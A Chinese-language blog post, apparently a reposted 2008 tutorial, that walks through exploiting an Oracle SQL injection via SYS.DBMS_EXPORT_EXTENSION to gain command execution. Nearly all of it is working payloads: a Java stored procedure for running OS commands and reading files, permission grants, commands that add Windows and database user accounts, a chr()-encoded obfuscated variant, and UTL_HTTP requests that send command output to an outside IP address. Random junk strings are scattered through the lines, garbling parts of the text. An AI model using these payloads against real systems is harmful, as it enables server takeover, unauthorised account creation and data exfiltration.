
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 " 'a'|| " 是为了让语句返回 true 值)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 Oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||(
$ u" `1 O% ?$ T6 Y8 t& qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ J7 X5 d, Z$ G6 ~$ Wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(; U8 |: p1 G. a6 d$ \6 ~5 p/ J, A
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
# i4 _% w- Q6 `# Q7 [/ w# j}'''';END;'';END;--','SYS',0,'1',0) from dual : f& Z9 R$ P, V! W1 O
) ; ~9 r7 b2 V+ b1 _$ j
------------------------
如果 URL 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
: H6 u7 ?6 i. Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 p  ?# R8 G( Z3 S  V, `* a& Lcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(+ b' I8 K+ M( }& V
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. H* u' }; p+ m) B}'''';END;'';END;--','SYS',0,'1',0) from dual & F; U4 W5 P% x& _
) 1 J8 ]+ _; y, g
同时把后面步骤中提到的对 readFile() 的处理语句去掉。
------------------------------
2. 赋 Java 权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. 创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# Y$ N/ R7 ?* S  Dcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
2 f- d5 g0 w- o* U( D) Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
; {# a) E" |, b  screate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. 赋 public 执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
/ Q" E" E$ v1 Y: }7 a; k+ \select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual3 H6 l4 t0 ~0 k& O: }9 K
5. 测试上面的几步是否成功
" E4 ~  B7 e# d) v, Iand '1'<>'11'||(
, i" r" d6 q- U! c1 `2 S* Oselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
1 ^2 {* T6 M1 x% r% u# |) 0 g. [" h& ?1 C
and '1'<>(
8 C. G; u4 H1 mselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'   m3 m9 s! g8 b+ p
) ) A  I# f8 w3 G7 B
6. 执行命令:
/xxx.jsp?id=1 and '1'<>( : I5 V" G4 J6 A" ]. G- S+ B8 s
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 0 `6 F* r3 l* [# z4 {

; f7 R1 V. l) x# @3 s  ]" U)
2 D, ]' o! t+ J$ Z+ {/xxx.jsp?id=1 and '1'<>( 8 s! T% f: X/ w9 ~
select  sys.LinxReadFile('c:/boot.ini') from dual$ V4 a" I, b9 `- c

+ T/ h7 Z- {% o2 s, D: A)
注意 sys.LinxReadFile() 返回的是 varchar 类型,不能用 "and 1<>" 代替 "and '1'<>"。
如果要查看运行结果,可以用 union:
$ v* I2 g3 p; D& b# K: B3 K/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual. }# J( e6 k9 X/ \- \
或者用 UTL_HTTP.request():
/xxx.jsp?id=1 and '1'<>(
5 R. @7 j0 S% A  T- ^1 I0 \SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual; v9 R( \8 ^+ `' W! j' W8 a
) 7 k: Q$ S4 x8 [5 }9 q6 J' G
/xxx.jsp?id=1 and '1'<>(
7 E7 f' Y" |; d5 L: ~! U# j+ ISELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
  {( V4 J" b. v/ V. Z" O)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交 HTTP request。用 utl_encode.base64_encode 也可以。
--------------------
6. 内部变化
通过以下命令可以查看 all_objects 表的改变:
; \4 u5 y6 {7 _8 p9 F1 P/ cselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'+ ~( o3 s$ a1 w0 |* d! m/ D
7. 删除我们创建的函数
6 k$ t6 A' ?7 p2 F$ uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 n6 A/ G& y- X1 x; s+ m' n7 J
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
; v+ p: T- V' y124829445 7 v' {7 R3 M1 q, L# V+ q& ]& V. A# R$ P
2008.1.12
  h" b$ `. {1 W" h7 qlinyujian@bjfu.edu.cn : X) M, w! D( A6 B. G
======================================================================
测试漏洞的另一方法:
创建 Oracle 帐号:
# s& D, m6 F5 e+ z; W& }" ]: a& |5 Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  F1 B* q; Y' m! X4 b1 `CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual6 J* W7 z5 d5 N/ \0 P- {
即:
( o/ L: C$ J# Y3 i+ zselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
* [7 W& Q9 ?' K8 M, t! ?$ _chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
" J; S. w& M2 f- x7 C+ a' ?1 [* O确定漏洞存在:   i- U) k. D4 t* ?1 f+ k
1<>( ! I5 ^/ k0 a3 J: l
select user_id from all_users where username='LINXSQL'
  y, y* T$ X0 d0 ]7 d% b) v)
给 linxsql 连接权限:
) \+ t0 ^8 N: H' U. uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# s! @% W! M+ T
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! q8 O$ q% i5 f: ^6 Rdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1"。但该函数声明为 authid current_user,权限继承自调用者,可能仅仅是 public 权限,作用似乎不大;真的要用到的话可以考虑 grant dba to 当前的 User:
& x8 r4 ^8 l( h( ^0 `# r# C5 N1.jsp?id=1 and '1'<>(
: Y- o" m$ G4 \  `) p$ F7 nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
, }/ u% [! F% @/ U5 z" h7 s) \create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
8 c8 a+ k" x+ M: P- o4 G5 }) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
3 F" a1 p  D3 i# W! t+ t )3 B7 x# Z. E$ h1 }; `- q- g